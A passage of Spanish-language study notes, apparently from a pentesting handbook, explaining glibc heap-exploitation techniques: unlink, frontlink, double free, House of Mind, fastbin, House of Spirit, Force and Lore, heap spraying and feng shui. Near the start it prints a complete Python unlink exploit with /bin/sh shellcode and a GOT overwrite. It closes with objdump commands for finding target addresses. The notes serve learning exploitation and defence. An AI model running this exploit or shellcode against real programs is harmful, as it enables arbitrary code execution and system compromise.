Al llamar a unlink\(\) usará como P-&gt;fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12\(pues en FD-&gt;bk le sumará 12 a la dirección guardada en FD\) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode\(P-&gt;bk falso\).

**from struct import \***

**import os**

**shellcode = "\xeb\x0caaaabbbbcccc" \#jm 12 + 12bytes de relleno**

**shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \**

**"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \**

**"\x80\xe8\xdc\xff\xff\xff/bin/sh";**

**prev\_size = pack\("&lt;I”, 0xfffffff0\) \#Interesa que el bit que indica que el anterior trozo está libre esté a 1**

**fake\_size = pack\("&lt;I”, 0xfffffffc\) \#-4, para que piense que el “size” del 3º trozo está 4bytes detrás \(apunta a prev\_size\) pues es ahí donde mira si el 2º trozo está libre**

**addr\_sc = pack\("&lt;I", 0x0804a008 + 8\) \#En el payload al principio le vamos a poner 8bytes de relleno**

**got\_free = pack\("&lt;I", 0x08048300 - 12\) \#Dirección de free\(\) en la plt-12 \(será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free\)**

**payload = "aaaabbbb" + shellcode + "b"\*\(512-len\(shellcode\)-8\) \# Como se dijo el payload comienza con 8 bytes de relleno porque sí**

**payload += prev\_size + fake\_size + got\_free + addr\_sc \#Se modifica el 2º trozo, el got\_free apunta a donde vamos a guardar la direccion addr\_sc + 12**

**os.system\("./8.3.o " + payload\)**

**unset\(\) liberando en sentido inverso \(wargame\)**

Estamos controlando 3 chunks consecutivos y se liberan en orden inverso al reservado.

En ese caso:

En el chunck c se pone el shellcode

El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV\_INUSE desactivado de forma que piense que el chunck a está libre.

Además, se sobreescribe en la cabecera b el size para que valga -4.

Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink\(\) para desenlazarlo. Sin embargo, como la cabecera PREV\_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink\(\) a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”.

De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts\(\)”-12 tenemos nuestro payload.

**Técnica de Frontlink**

Se llama a frontlink cuando se libera algo y ninguno de sus trozos contiguos no son libres, no se llama a unlink\(\) sino que se llama directamente a frontlink\(\).

Vulnerabilidad útil cuando el malloc que se ataca nunca es liberado \(free\(\)\).

Necesita:

Un buffer que pueda desbordarse con la función de entrada de datos

Un buffer contiguo a este que debe ser liberado y al que se le modificará el campo fd de su cabecera gracias al desbordamiento del buffer anterior

Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior

Un buffer declarado antes del paso 3 que permita sobreescribir el prev\_size de este

De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit.

**Vulnerabilidad double free\(\)**

Si se llama dos veces a free\(\) con el mismo puntero, quedan dos bins apuntando a la misma dirección.

En caso de querer volver a usar uno se asignaría sin problemas. En caso de querer usar otro, se le asignaría el mismo espacio por lo que tendríamos los punteros “fd” y “bk” falseados con los datos que escribirá la reserva anterior.

**After free\(\)**

Un puntero previamente liberado es usado de nuevo sin control.

## **8 Heap Overflows: Exploits avanzados**

Las técnicas de Unlink\(\) y FrontLink\(\) fueron eliminadas al modificar la función unlink\(\).

#### **The house of mind**

Solo una llamada a free\(\) es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado.

Una llamada a free\(\) provoca llamar a public\_fREe\(mem\), este hace:

mstate ar\_ptr;

mchunkptr p;

…

p = mem2chunk\(mes\); —&gt; Devuelve un puntero a la dirección donde comienza el trozo \(mem-8\)

…

ar\_ptr = arena\_for\_chunk\(p\); —&gt; chunk\_non\_main\_arena\(ptr\)?heap\_for\_ptr\(ptr\)-&gt;ar\_ptr:&main\_arena \[1\]

…

\_int\_free\(ar\_ptr, mem\);

}

En \[1\] comprueba el campo size el bit NON\_MAIN\_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap\_for\_ptr\(\) que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes \(en nuestro caso de 0x0804a000 deja 0x08000000\) y accede a 0x08000000-&gt;ar\_ptr \(como si fuese un struct heap\_info\)

De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap\_for\_ptr\(ptr\)-&gt;ar\_ptr devuelve lo que hemos escrito en 0x08100000 \(pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar\_ptr\)

De esta forma se llama a \_int\_free\(ar\_ptr, mem\), es decir, **\_int\_free\(0x0804a000, 0x081002a0\)  
\_int\_free\(mstate av, Void\_t\* mem\){**  
…  
bck = unsorted\_chunks\(av\);  
fwd = bck-&gt;fd;  
p-&gt;bk = bck;  
p-&gt;fd = fwd;  
bck-&gt;fd = p;  
fwd-&gt;bk = p;

..}

Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar.

Tal y como se define unsorted\_chunks, sabemos que:  
bck = &av-&gt;bins\[2\]-8;  
fwd = bck-&gt;fd = \*\(av-&gt;bins\[2\]\);  
fwd-&gt;bk = \*\(av-&gt;bins\[2\] + 12\) = p;

Por lo tanto si en av-&gt;bins\[2\] escribimos el valor de \_\_DTOR\_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR\_END\_\_ la dirección del segundo trozo.

Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR\_END\_\_-12 porque de ahí la sacará av-&gt;bins\[2\]

En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap\_for\_ptr\(\) piense que el ar\_ptr está al inicio del primer trozo y saque de ahí el av-&gt;bins\[2\]

En el segundo trozo y gracias al primero sobreescribimos el prev\_size con un jump 0x0c y el size con algo para activar -&gt; NON\_MAIN\_ARENA

A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode

De esta forma se llamará a \_int\_free\(TROZO1, TROZO2\) y seguirá las instrucciones para escribir en \_\_DTOR\_END\_\_ la dirección del prev\_size del TROZO2 el cual saltará a la shellcode.

Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload.

Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para unlink. Se comparan si el nuevo sitio al que se apunta también le está apuntando a él.

**Fastbin**

Es una variante de The house of mind

nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int\_free\(\)

fb = &\(av-&gt;fastbins\[fastbin\_index\(size\)\] —&gt; Siendo fastbin\_index\(sz\) —&gt; \(sz &gt;&gt; 3\) - 2

…

p-&gt;fd = \*fb

\*fb = p

De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av-&gt;max\_fast esté en la dirección que vamos a sobreescribir.

Dado que con The House of Mind se vio que nosotros controlábamos la posición del av.

Entones si en el campo size ponemos un tamaño de 8 + NON\_MAIN\_ARENA + PREV\_INUSE —&gt; fastbin\_index\(\) nos devolverá fastbins\[-1\], que apuntará a av-&gt;max\_fast

En este caso av-&gt;max\_fast será la dirección que se sobrescrita \(no a la que apunte, sino esa posición será la que se sobrescrita\).

Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -&gt; Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 \(como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops\).

Además, ese mismo trozo falso debe ser menor que av-&gt;system\_mem. av-&gt;system\_mem se encuentra 1848 bytes más allá.

Por culpa de los nulos de \_DTOR\_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila.

Otra forma de ataque es redirigir el **av** hacia la pila.

Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index\(\) nos devolverá fastbins\[0\] y podemos hacer uso de esto para sobreescribir la pila.

Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET

Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av**  es el mutexe que tiene que valer 0.

El **av-&gt;max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones.

En el **av-&gt;fastbins\[0\]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode.

Además, en **av-&gt;system\_mem** \(1484bytes por encima de la posición en la pila\) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza.

Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -&gt; Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 \(como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso\).

**The House of Spirit**

En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante \(por ej, que el puntero esté en el stack debajo de un posible overflow a una variable\).

Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av-&gt;max\_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc\(\)+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc\(40\), el tamaño del trozo falso debe ser igual a 48.

Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes \(que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size\). Además, la dirección ptr-4+48 debe cumplir varias condiciones \(siendo en este caso ptr=EBP\), es decir, 8 &lt; ptr-4+48 &lt; av-&gt;system\_mem.

En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc\(40\) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera.

Esto creo que es porque así cuando lo libere free\(\) guardará que en la dirección que apunta al EBP del stack hay un trozo de tamaño perfecto para el nuevo malloc\(\) que se quiere reservar, así que le asigna esa dirección.

**The House of Force**

Es necesario:

* Un overflow a un trozo que permita sobreescribir el wilderness
* Una llamada a malloc\(\) con el tamaño definido por el usuario
* Una llamada a malloc\(\) cuyos datos puedan ser definidos por el usuario

Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande \(0xffffffff\), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int\_malloc\(\) sin necesidad de expandir el heap

Lo segundo es alterar el av-&gt;top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av-&gt;top se pondrá &EIP - 8.

Tenemos que sobreescrbir av-&gt;top para que apunte a la zona de memoria bajo el control del atacante:

victim = av-&gt;top;

remainder = chunck\_at\_offset\(victim, nb\);

av-&gt;top = remainder;

Victim recoge el valor de la dirección del trozo wilderness actual \(el actual av-&gt;top\) y remainder es exactamente la suma de esa dirección más la cantidad de bytes solicitados por malloc\(\). Por lo que si &EIP-8 está en 0xbffff224 y av-&gt;top contiene 0x080c2788, entonces la cantidad que tenemos que reservar en el malloc controlado para que av-&gt;top quede apuntando a $EIP-8 para el próximo malloc\(\) será:

0xbffff224 - 0x080c2788 = 3086207644.

Así se guardará en av-&gt;top el valor alterado y el próximo malloc apuntará al EIP y lo podrá sobreescribir.

Es importante saber que el size del nuevo trozo wilderness sea más grande que la solicitud realizada por el último malloc\(\). Es decir, si el wilderness está apuntando a &EIP-8, el size quedará justo en el campo EBP del stack.

**The House of Lore**

**Corrupción SmallBin**

Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado.

Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av-&gt;max\_fast \(72normalmente\) y menos  a MIN\_LARGE\_SIZE \(512\).

Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo:

bck = victim-&gt;bk; Apunta al trozo anterior, es la única info que podemos alterar.

bin-&gt;bk = bck; El penúltimo trozo pasa a ser el último, en caso de que bck apunte al stack al siguiente trozo reservado se le dará esta dirección

bck-&gt;fd = bin; Se cierra la lista haciendo que este apunte a bin

Se necesita:

Que se reserven dos malloc, de forma que al primero se le pueda hacer overflow después de que el segundo haya sido liberado e introducido en su bin \(es decir, se haya reservado un malloc superior al segundo trozo antes de hacer el overflow\)

Que el malloc reservado al que se le da la dirección elegida por el atacante sea controlada por el atacante.

El objetivo es el siguiente, si podemos hacer un overflow a un heap que tiene por debajo un trozo ya liberado y en su bin, podemos alterar su puntero bk. Si alteramos su puntero bk y este trozo llega a ser el primero de la lista de bin y se reserva, a bin se le engañará y se le dirá que el último trozo de la lista \(el siguiente en ofrecer\) está en la dirección falsa que hayamos puesto \(al stack o GOT por ejemplo\). Por lo que si se vuelve a reservar otro trozo y el atacante tiene permisos en él, se le dará un trozo en la posición deseada y podrá escribir en ella.

Tras liberar el trozo modificado es necesario que se reserve un trozo mayor al liberado, así el trozo modificado saldrá de unsorted bins y se introduciría en su bin.

Una vez en su bin es el momento de modificarle el puntero bk mediante el overflow para que apunte a la dirección que queramos sobreescribir.

Así el bin deberá esperar turno a que se llame a malloc\(\) suficientes veces como para que se vuelva a utilizar el bin modificado y engañe a bin haciéndole creer que el siguiente trozo está en la dirección falsa. Y a continuación se dará el trozo que nos interesa.

Para que se ejecute la vulnerabilidad lo antes posible lo ideal sería: Reserva del trozo vulnerable, reserva del trozo que se modificará, se libera este trozo, se reserva un trozo más grande al que se modificará, se modifica el trozo \(vulnerabilidad\), se reserva un trozo de igual tamaño al vulnerado y se reserva un segundo trozo de igual tamaño y este será el que apunte a la dirección elegida.

Para proteger este ataque se uso la típica comprobación de que el trozo “no” es falso: se comprueba si bck-&gt;fd está apuntando a victim. Es decir, en nuestro caso si el puntero fd\* del trozo falso apuntado en el stack está apuntando a victim. Para sobrepasar esta protección el atacante debería ser capaz de escribir de alguna forma \(por el stack probablemente\) en la dirección adecuada la dirección de victim. Para que así parezca un trozo verdadero.

**Corrupción LargeBin**

Se necesitan los mismos requisitos que antes y alguno más, además los trozos reservados deben ser mayores a 512.

El ataque es como el anterior, es decir, ha que modificar el puntero bk y se necesitan todas esas llamadas a malloc\(\), pero además hay que modificar el size del trozo modificado de forma que ese size - nb sea &lt; MINSIZE.

Por ejemplo hará que poner en size 1552 para que 1552 - 1544 = 8 &lt; MINSIZE \(la resta no puede quedar negativa porque se compara un unsigned\)

Además se ha introducido un parche para hacerlo aún más complicado.

**Heap Spraying**

Básicamente consiste en reservar tooda la memoria posible para heaps y rellenar estos con un colchón de nops acabados por una shellcode. Además, como colchón se utiliza 0x0c. Pues se intentará saltar a la dirección 0x0c0c0c0c, y así si se sobreescribe alguna dirección a la que se vaya a llamar con este colchón se saltará allí. Básicamente la táctica es reservar lo máximos posible para ver si se sobreescribe algún puntero y saltar a 0x0c0c0c0c esperando que allí haya nops.

**Heap Feng Shui**

Consiste en mediante reservas y liberaciones sementar la memoria de forma que queden trozos reservados entre medias de trozos libres. El buffer a desbordar se situará en uno de los huevos.

**objdump -d ejecutable** —&gt; Disas functions  
**objdump -d ./PROGRAMA \| grep FUNCION** —&gt; Get function address  
**objdump -d  -Mintel ./shellcodeout** —&gt; Para ver que efectivamente es nuestra shellcode y sacar los OpCodes  
**objdump -t ./exec \| grep varBss** —&gt; Tabla de símbolos, para sacar address de variables y funciones  
**objdump -TR ./exec \| grep exit\(func lib\)** —&gt; Para sacar address de funciones de librerías \(GOT\)  
**objdump -d ./exec \| grep funcCode  
objdump -s -j .dtors /exec  
objdump -s -j .got ./exec  
objdump -t --dynamic-relo ./exec \| grep puts** —&gt; Saca la dirección de puts a sobreescribir en le GOT  
**objdump -D ./exec** —&gt; Disas ALL hasta las entradas de la plt  
**objdump -p -/exec  
Info functions strncmp —&gt;** Info de la función en gdb

## Interesting courses

* [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io/)
* [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE)

